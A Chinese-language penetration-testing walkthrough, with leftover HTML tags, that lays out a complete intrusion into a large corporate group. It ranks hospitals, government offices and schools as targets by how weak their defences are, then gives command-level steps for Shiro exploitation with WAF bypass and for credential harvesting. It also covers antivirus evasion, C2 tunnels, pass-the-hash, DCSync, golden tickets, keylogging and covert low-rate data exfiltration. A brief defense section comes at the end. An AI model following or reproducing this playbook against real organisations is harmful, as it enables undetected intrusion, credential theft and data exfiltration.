某大型集团渗透测试实战全流程解析<\/h1>

一、目标评估与优先级划分<\/h2>

在渗透测试初期，需要对目标资产进行科学分类，建立攻击优先级：<\/p>

第一梯度（高优先级）<\/strong>：<\/p>

私企、医疗、科技园区、工厂<\/li>
特点：业务体量大、互联网暴露面多<\/li> <\/ul>
第二梯度（中优先级）<\/strong>：<\/p>

政府单位（人社厅\/局、教育厅\/局）<\/li>
学校、国企<\/li>
特点：防护等级中等，安全意识薄弱，监控力度昼夜差异大<\/li> <\/ul>
第三梯度（低优先级）<\/strong>：<\/p>

电力、金融系统<\/li>
特点：安全性高、暴露面少，安全规范严格<\/li> <\/ul>
二、信息收集方法论<\/h2>
1. 资产测绘三维度<\/h3>

企业关联查询<\/strong>：<\/p>

使用爱企查查询控股子公司<\/li>
分析招标文件和官网信息获取第三方供应商<\/li>
通过ICP备案查询注册域名、小程序和APP资产<\/li> <\/ul> <\/li>

自动化收集工具链<\/strong>：<\/p>

子域名扫描（OneForAll、subfinder）<\/li>
DNS查询（dig、nslookup）<\/li>
端口扫描（masscan、nmap）<\/li>
指纹识别（Wappalyzer、EHole）<\/li>
漏洞测试（Nuclei、Xray）<\/li> <\/ul> <\/li>

业务针对性收集<\/strong>：<\/p>

针对制造业重点关注：出售平台、制造平台<\/li>
根据主要业务进行旁站信息收集<\/li> <\/ul> <\/li> <\/ol>
2. 关键资产定位技巧<\/h3>
网络空间测绘平台使用<\/strong>：<\/p>

Hunter：备案内容收录全面，搜索语法：domain="xxx.com"<\/code><\/li>
Fofa：数据量大但效率下降<\/li>
360Quake：备案资产收集顶尖<\/li>
零零信安：移动资产、小程序搜索突出<\/li>
微步情报社区：端口、whois信息、子域名收集顶级<\/li> <\/ul> 高级搜索语法<\/strong>：<\/p> # title关键字<\/span> <\/span><\/span>domain=<\/span>"xxx.com"<\/span> &&<\/span> (<\/span>web.title=<\/span>"管理"<\/span> ||<\/span> web.title=<\/span>"后台"<\/span> ||<\/span> web.title=<\/span>"登录"<\/span> ||<\/span> web.title=<\/span>"邮件"<\/span> ||<\/span> web.title=<\/span>"教务"<\/span> ||<\/span> web.title=<\/span>"注册"<\/span> ||<\/span> web.title=<\/span>"访客"<\/span>)<\/span> <\/span><\/span> <\/span><\/span># body关键字<\/span> <\/span><\/span>domain=<\/span>"xxx.com"<\/span> &&<\/span> (<\/span>web.body=<\/span>"管理"<\/span> ||<\/span> web.body=<\/span>"后台"<\/span> ||<\/span> web.body=<\/span>"登录"<\/span> ||<\/span> web.body=<\/span>"用户名"<\/span> ||<\/span> web.body=<\/span>"密码"<\/span> ||<\/span> web.body=<\/span>"验证码"<\/span> ||<\/span> web.body=<\/span>"系统"<\/span> ||<\/span> web.body=<\/span>"账号"<\/span> ||<\/span> web.body=<\/span>"忘记密码"<\/span>)<\/span> <\/span><\/span><\/code><\/pre>三、漏洞利用实战：Shiro反序列化<\/h2> 1. 攻击准备<\/h3> 指纹识别<\/strong>：<\/p> 识别Shiro框架特征（Cookie中的rememberMe字段）<\/li> <\/ul> <\/li> 密钥爆破<\/strong>：<\/p> 推荐工具：ShiroAttack2<\/a><\/li> 关键改进：添加WAF绕过功能（随机延迟、请求头伪造、IP轮换）<\/li> <\/ul> <\/li> 规避检测<\/strong>：<\/p> 避免使用一键化工具<\/li> 采用低频率、随机化请求模式<\/li> 建议对工具进行二次开发<\/li> <\/ul> <\/li> <\/ol> 2. 后渗透操作<\/h3> 敏感信息收集<\/strong>：<\/p> dir \/s\/b *.conf # 快速定位配置文件<\/span> <\/span><\/span><\/code><\/pre><\/li> 自动化信息收集脚本<\/strong>：<\/p> 使用Go编写轻量级敏感信息扫描工具<\/li> 关键扫描字段： jdbc, redis, mysql, pgsql, oracle, oss.accessKey, oss.secretKey, password, username, mail, token, datasource, accessKeyId, mssql, sqlserver <\/code><\/pre> <\/li> <\/ul> <\/li> 密码规律分析<\/strong>：<\/p> 企业常用密码模式：公司名+年份+特殊符号（如wanhai2025@!）<\/li> 内网密码往往存在前几位重复<\/li> <\/ul> <\/li> <\/ol> 四、内网渗透策略<\/h2> 1. 初始立足点加固<\/h3> 信息收集优先级<\/strong>：<\/p> 系统信息（ipconfig \/all, systeminfo）<\/li> 用户会话（query user, net session）<\/li> 网络拓扑（arp -a, netstat -ano）<\/li> 安全产品（tasklist \/svc, Get-MpComputerStatus）<\/li> <\/ul> <\/li> 规避杀软（ESET企业版）<\/strong>：<\/p> 免杀技术：内存加载（Donut、sRDI）<\/li> 进程注入（Process Hollowing）<\/li> 白名单劫持（COM劫持、DLL侧加载）<\/li> <\/ul> <\/li> 应急方案：使用火绒强碎粉碎杀软安装目录<\/li> <\/ul> <\/li> C2选择<\/strong>：<\/p> 前期使用Vshell搭建内网隧道<\/li> 后期转Cobalt Strike利用插件优势<\/li> 推荐工具：Adaptixde、Havoc的beacon<\/li> <\/ul> <\/li> <\/ol> 2. 内网侦察<\/h3> 资产发现<\/strong>：<\/p> 使用免杀版fscan（速率调低）<\/li> 网段探测工具：netspy<\/li> 扫描重点：RDP、数据库服务<\/li> <\/ul> <\/li> 横向移动路径<\/strong>：<\/p> 优先获取主机权限而非Web权限<\/li> 建立跳板机避免入口点丢失<\/li> <\/ul> <\/li> <\/ol> 五、域渗透全流程<\/h2> 1. 域内信息收集<\/h3> 基础命令<\/strong>：<\/p> ipconfig \/all # 查看DNS服务器（通常为域控） <\/span><\/span>systeminfo # 获取域信息 <\/span><\/span>net time \/domain # 探测域控主机名 <\/span><\/span>net config workstation # 显示工作站域 <\/span><\/span>whoami \/all # 查看用户权限和SID <\/span><\/span><\/code><\/pre>用户与组枚举<\/strong>：<\/p> net user \/domain # 列出域用户 <\/span><\/span>net user <username> \/domain # 查询指定用户 <\/span><\/span>net group \/domain # 列出域组 <\/span><\/span>net group "Domain Admins"<\/span> \/domain # 枚举域管 <\/span><\/span><\/code><\/pre>高级收集<\/strong>：<\/p> # SPN扫描<\/span> <\/span><\/span>setspn -T <domain> -Q *\/* <\/span><\/span> <\/span><\/span># 使用PowerView收集<\/span> <\/span><\/span>Get-ADObject -LDAPFilter "(servicePrincipalName=*)"<\/span> -Properties servicePrincipalName <\/span><\/span>Get-DomainGPOUserLocalGroupMapping <\/span><\/span>Invoke-ACLScanner <\/span><\/span><\/code><\/pre>2. 横向移动技术<\/h3> 凭证传递<\/strong>：<\/p> Pass The Hash (PtH)： crackmapexec smb <targets> -u <user> -H <hash> <\/span><\/span>psexec.py -hashes :<hash> <user>@<target> <\/span><\/span><\/code><\/pre><\/li> Pass The Ticket (PtT)： kerberos::ptt <ticket.kirbi> <\/code><\/pre> <\/li> <\/ul> <\/li> 远程执行<\/strong>：<\/p> WMI： wmic \/node:<target> \/user:<user> \/password:<pass> process call create "cmd.exe \/c ..."<\/span> <\/span><\/span><\/code><\/pre><\/li> WinRM： Enter-PSSession -ComputerName <target> -Credential <cred> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 计划任务<\/strong>：<\/p> schtasks \/create \/s <target> \/ru <user> \/rp <pass> \/tn <name> \/tr "cmd.exe \/c ..."<\/span> \/sc once \/st <time> <\/span><\/span>schtasks \/run \/s <target> \/tn <name> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3. 跨域攻击<\/h3> 域信任发现<\/strong>：<\/p> nltest \/domain_trusts <\/span><\/span><\/code><\/pre><\/li> DCSync攻击<\/strong>：<\/p> 前提条件：需具备Administrators\/Domain Admins\/Enterprise Admins权限<\/li> 执行方法： lsadump::dcsync \/domain:<domain> \/user:krbtgt <\/code><\/pre> <\/li> <\/ul> <\/li> 黄金票据制作<\/strong>：<\/p> 所需信息：krbtgt的NTLM哈希、域SID<\/li> 使用mimikatz生成： kerberos::golden \/user:Administrator \/domain:<domain> \/sid:<SID> \/krbtgt:<hash> \/ptt <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ol> 六、高级持久化与业务渗透<\/h2> 1. 组织架构分析<\/h3> # OU结构分析<\/span> <\/span><\/span>Get-ADOrganizationalUnit -Filter * | select Name, DistinguishedName <\/span><\/span> <\/span><\/span># 用户业务属性分析<\/span> <\/span><\/span>Get-ADUser -Filter * -Properties DisplayName, Description, EmailAddress <\/span><\/span> <\/span><\/span># 计算机命名规则分析<\/span> <\/span><\/span>Get-ADComputer -Filter * -Properties OperatingSystem, LastLogonDate <\/span><\/span><\/code><\/pre>2. 业务目标定位策略<\/h3> 关键部门映射<\/strong>：<\/p> 董事会\/总经理办公室：战略决策文件<\/li> 财务中心：财务数据、资金流水<\/li> 研发部门：产品源码、专利文档<\/li> 人力行政：员工敏感信息<\/li> <\/ul> <\/li> 用户行为分析<\/strong>：<\/p> 浏览器历史与书签分析<\/li> 邮件客户端数据挖掘<\/li> 云服务同步目录监控<\/li> 近期文档访问记录<\/li> <\/ul> <\/li> <\/ol> 3. 隐蔽渗透原则<\/h3> 业务拟态<\/strong>：<\/p> 模拟正常用户访问模式<\/li> 遵循目标组织的工作时间规律<\/li> 使用业务相关文件名和内容<\/li> <\/ul> <\/li> 数据获取策略<\/strong>：<\/p> 优先获取业务系统凭据而非直接下载数据<\/li> 通过业务系统正常功能导出数据<\/li> 采用低频、小批量数据外传<\/li> <\/ul> <\/li> <\/ol> 七、工具与资源推荐<\/h2> Shiro利用<\/strong>：<\/p> ShiroAttack2<\/a>（推荐二次开发）<\/li> <\/ul> <\/li> 域信息收集<\/strong>：<\/p> Darksteel<\/a>（规避流量检测）<\/li> PowerView（BloodHound组件）<\/li> <\/ul> <\/li> 免杀框架<\/strong>：<\/p> Havoc（开源C2）<\/li> Adaptixde（商业级免杀）<\/li> <\/ul> <\/li> 横向移动<\/strong>：<\/p> CrackMapExec（多协议横向）<\/li> Rubeus（Kerberos操作）<\/li> <\/ul> <\/li> 行为分析<\/strong>：<\/p> PowerSploit的Get-Keystrokes<\/li> Nishang的Get-TimedScreenshot<\/li> <\/ul> <\/li> <\/ol> 八、防御建议<\/h2> Shiro防护<\/strong>：<\/p> 升级到最新版本<\/li> 修改默认加密密钥<\/li> 添加WAF规则拦截反序列化攻击<\/li> <\/ul> <\/li> 域安全加固<\/strong>：<\/p> 限制DCSync权限<\/li> 监控krbtgt账户变更<\/li> 启用LSA保护<\/li> <\/ul> <\/li> 内网监控<\/strong>：<\/p> 建立基线网络行为模型<\/li> 监控异常SPN请求<\/li> 审计高权限账户的登录行为<\/li> <\/ul> <\/li> 终端防护<\/strong>：<\/p> 应用白名单策略<\/li> 限制PowerShell执行权限<\/li> 监控异常进程注入行为<\/li> <\/ul> <\/li> <\/ol> 本教学文档完整还原了从外网突破到内网域控控制的全过程，重点突出了Shiro反序列化利用、内网横向移动、域渗透技术以及高级业务目标定位策略，可作为企业红队演练的实战参考。<\/p>